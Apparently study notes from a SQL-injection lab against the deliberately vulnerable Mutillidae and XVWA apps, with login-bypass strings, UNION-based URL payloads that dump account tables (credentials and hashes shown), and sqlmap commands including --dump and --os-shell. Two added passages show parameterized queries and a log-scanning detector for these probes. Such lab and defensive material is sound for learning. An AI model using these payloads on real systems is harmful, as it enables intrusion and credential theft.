
SQL INJECTION

-----------------------------------------------------------------------------------
=============================== SQL INJECTION =====================================
-----------------------------------------------------------------------------------

mysql -u root -h 192.168.149.128
show databases;
use owasp10;
show tables;
select * from accounts;
------------------------------------
DISCOVERING SQL INJECTION IN POST
------------------------------------

Go to any login page which uses SQL.

Enter ' in the login and password boxes and see the output.



Select * from accounts where username= 'zaid' and password='123456'

Give a correct username (here noob) and enter one of the following as the password:

1234' and 1=1#

or

"" or 1=1 --"

The query then becomes:

Select * from accounts where username= 'zaid' and password='PASSWORD' and 1=1 #'

--------------------------------------------------------------------------

Hacking MySql DB password
-------------------------

Select * from accounts where username= 'zaid' and password='anytext' or 1=1 #'

anytext' or 1=1 #

----------------------------------------------------------------------------

Hacking Username and password
-----------------------------

Select * from accounts where username= 'admin' #' and password='anytext' or 1=1 #'

admin' #

Select * from accounts where username= 'admin'
// Because of the # (comment), the rest of the query is not executed and we can bypass the login

-----------------------------------------------------------------------------------------------
========================== HACKING Medium SQL DATABASES ===================================
-----------------------------------------------------------------------------------------------
SQL injection filtering can be done in 2 places --> client-side filtering and server-side filtering; only the server-side filter actually stops it, because a client-side filter runs in the browser and never sees a request that was edited in transit.

A client-side filter can be bypassed using Burp Suite:

intercept the login request and change the password parameter in the Request tab.
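As an added example (not code from these notes or from the Mutillidae application), the following Python shows the login check from the POST section built by string concatenation next to the same check with bound parameters, which is the server-side defence that holds where the client-side filter above does not. It runs against a constructed in-memory SQLite table and uses `-- ` (with a trailing space) in place of MySQL's `#` terminator, since both engines treat it as a line comment.

```python
import sqlite3

# Constructed sample rows shaped like the accounts table the notes enumerate
# (cid, username, password, is_admin); the values are made up for this example.
SAMPLE_ACCOUNTS = [
    (1, "admin", "adminpass", 1),
    (2, "noob", "1234", 0),
]


def make_db():
    """In-memory SQLite stand-in for the lab's MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table accounts "
                 "(cid integer, username text, password text, is_admin integer)")
    conn.executemany("insert into accounts values (?, ?, ?, ?)", SAMPLE_ACCOUNTS)
    return conn


def login_vulnerable(conn, username, password):
    """Builds the WHERE clause by string formatting: the pattern the notes exploit.
    Returns the usernames the query matches (a non-empty list means 'logged in')."""
    sql = ("select username from accounts where username='%s' and password='%s'"
           % (username, password))
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Same check with bound parameters: the driver sends the values separately
    from the SQL text, so a quote or comment marker in the input stays data."""
    rows = conn.execute(
        "select username from accounts where username=? and password=?",
        (username, password))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    # MySQL's '#' terminator from the notes is replaced by '-- ' (trailing space),
    # which both MySQL and SQLite treat as a line comment.
    print(login_vulnerable(db, "admin' -- ", "anything"))       # ['admin']
    print(login_vulnerable(db, "noob", "anytext' or 1=1 -- "))  # ['admin', 'noob']
    print(login_safe(db, "admin' -- ", "anything"))             # []
```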

------------------------------------------------------------------------------------------------
========================== Exploiting GET Requests in SQL ===================================
-----------------------------------------------------------------------------------------------

index.php?page=user-info.php&username=admin&password=adminpass&user-info-php-submit-button=View+Account+Details

Change the username parameter by appending:
-------------------------:
'order by 1%23           :
-------------------------:
http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=noob' order by 1%23&password=1234&user-info-php-submit-button=View+Account+Details

The %XX URL encoding is only needed when typing the payload directly into the address bar

%20 = space
%23 = #
%27 = '

--------------------------:
'union select 1,2,3,4,5%23:
--------------------------:
http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=noob'union select 1,2,3,4,5%23&password=1234&user-info-php-submit-button=View+Account+Details

Here columns 1 and 5 are not reflected in the page.

Only columns 2, 3 and 4 showed up in the output, so those are the ones we can substitute.

-------------------------------------------------:
'union select 1,database(),user(),version(),5%23 :
-------------------------------------------------:
http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=noob'union select 1,database(),user(),version(),5%23&password=1234&user-info-php-submit-button=View+Account+Details
information_schema: a default database created by MySQL; it contains the information about all other databases (their tables and columns)

-------------------------------------------------------------------------:
'union select 1,table_name,null,null,5 from information_schema.tables%23 :
-------------------------------------------------------------------------:

information_schema = database
tables = table
table_name = column

192.168.149.136/mutillidae/index.php?page=user-info.php&username=noob'union select 1,table_name,null,null,5 from information_schema.tables%23&password=1234&user-info-php-submit-button=View+Account+Details

Results for . 238 records found. // lists the tables of every database on the server (table_name is printed in the Username field)


-------------------------------------------------------------------------------------------------------:
'union select 1,table_name,null,null,5 from information_schema.tables where table_schema= 'owasp10'%23 :
-------------------------------------------------------------------------------------------------------:

192.168.149.136/mutillidae/index.php?page=user-info.php&username=noob'union select 1,table_name,null,null,5 from information_schema.tables where table_schema= 'owasp10'%23&password=1234&user-info-php-submit-button=View+Account+Details

Results for . 8 records found.

Username=accounts
Password=
Signature=

Username=blogs_table
Password=
Signature=

Username=captured_data
Password=
Signature=

Username=credit_cards
Password=
Signature=

Username=hitlog
Password=
Signature=

Username=pen_test_tools
Password=
Signature=


So we found the tables in the database; let's dig deeper.
To list the columns of a particular table (here accounts), the command is

--------------------------------------------------------------------------------------------------------:
'union select 1,column_name,null,null,5 from information_schema.columns where table_name= 'accounts'%23 :
--------------------------------------------------------------------------------------------------------:

192.168.149.136/mutillidae/index.php?page=user-info.php&username=noob'union select 1,column_name,null,null,5 from information_schema.columns where table_name= 'accounts'%23&password=1234&user-info-php-submit-button=View+Account+Details

Results for . 7 records found.

Username=cid
Password=
Signature=

Username=username
Password=
Signature=

Username=password
Password=
Signature=

Username=mysignature
Password=
Signature=

Username=is_admin
Password=
Signature=


So the columns in accounts are cid, username, password, mysignature, is_admin.

Now let's get the usernames and passwords from the table:


---------------------------------------------------------------:
'union select 1,username,password,is_admin,5 from accounts%23  :
---------------------------------------------------------------:

Columns 1 and 5 can't be substituted, as their data was not displayed when tested, so we use only 2, 3 and 4.

Results for . 19 records found.
Username=noob
Password=1234
Signature=Freak

Username=noob
Password=1234
Signature=Noob

Username=admin
Password=adminpass
Signature=TRUE

Username=adrian
Password=somepassword
Signature=TRUE

Username=kevin
Password=42
Signature=FALSE

Username=dave
Password=set
Signature=FALSE

Username=ed
Password=pentest
Signature=FALSE

=============================================================================

==================================================== SQLMAP =====================================================================

sqlmap --help
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"

List all the databases:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --dbs

Current User:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --current-user

Current DB:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --current-db

Tables:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --tables -D owasp10

Columns:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --columns -T accounts -D owasp10

Dump:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" -T accounts -D owasp10 --dump

OS Shell:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --os-shell

SQL Shell:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --sql-shell
current_user()
user()
database()
select table_name from information_schema.tables where table_schema = 'owasp10';
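As an added defender's example (not part of these notes), the following Python scans web-server access-log lines for the URL-encoded probes that the GET-request section and the sqlmap commands above leave behind: the `order by` probe, `union select`, `information_schema` lookups, `or 1=1` tautologies and a trailing `#` / `--` comment terminator. The log lines, client IP, timestamps and sizes are constructed for the example, modelled on the request URLs in the notes.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed access-log lines (combined log format) modelled on the GET requests
# in the notes; the client IP, timestamps and response sizes are made up.
SAMPLE_LOG = """\
192.168.149.1 - - [10/Mar/2021:10:01:02 +0000] "GET /mutillidae/index.php?page=user-info.php&username=noob&password=1234&user-info-php-submit-button=View+Account+Details HTTP/1.1" 200 5120
192.168.149.1 - - [10/Mar/2021:10:01:30 +0000] "GET /mutillidae/index.php?page=user-info.php&username=noob%27%20order%20by%201%23&password=1234&user-info-php-submit-button=View+Account+Details HTTP/1.1" 200 5120
192.168.149.1 - - [10/Mar/2021:10:02:11 +0000] "GET /mutillidae/index.php?page=user-info.php&username=noob%27union%20select%201,table_name,null,null,5%20from%20information_schema.tables%23&password=1234&user-info-php-submit-button=View+Account+Details HTTP/1.1" 200 9800
192.168.149.1 - - [10/Mar/2021:10:03:00 +0000] "GET /mutillidae/index.php?page=user-info.php&username=noob%27%20or%201=1%23&password=x&user-info-php-submit-button=View+Account+Details HTTP/1.1" 200 9900
"""

# Signatures matched against each *decoded* parameter value.
SIGNATURES = {
    "order_by_probe": re.compile(r"'\s*order\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "tautology": re.compile(r"'\s*or\s+\d+\s*=\s*\d+", re.I),
    "comment_terminator": re.compile(r"(#|--)\s*$"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def scan_url(url):
    """Return sorted (parameter, signature) pairs found in one request URL."""
    _, _, query = url.partition("?")
    hits = set()
    for param, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decoded once; decode again so a double-encoded quote
        # (%2527) cannot hide from the signatures.
        value = unquote_plus(value)
        for name, rx in SIGNATURES.items():
            if rx.search(value):
                hits.add((param, name))
    return sorted(hits)


def scan_log(text):
    """Return [(line_number, hits)] for every request line with at least one hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if m:
            hits = scan_url(m.group(1))
            if hits:
                findings.append((lineno, hits))
    return findings
```

Running `scan_log(SAMPLE_LOG)` reports lines 2, 3 and 4 with the signatures each probe trips, and nothing for the benign first request.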



-----------------------------------------------------------------------------------------------

'              // try entering ' to check for SQL injection
' order by 7#

Columns 2, 4, 5 and 6 are displayed in the output (the ones we can substitute)


'union select 1,database(),3,user(),version(),6,7 #

'union select 1,table_name,3,null,null,null,7 from information_schema.tables#


'union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema= 'xvwa'#
--> users,caffine,comments

'union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name= 'users'#
uid, username, password

'union select 1,username,3,password,uid,6,7 from users#

Item Code : admin   Description : 1
Item Name : 21232f297a57a5a743894a0e4a801fc3
Category : 6

Item Code : xvwa   Description : 2
Item Name : 570992ec4b5ad7a313f5dc8fd0825395
Category : 6

Item Code : user   Description : 3
Item Name : 25890deab1075e916c06b9e1efc2e25f




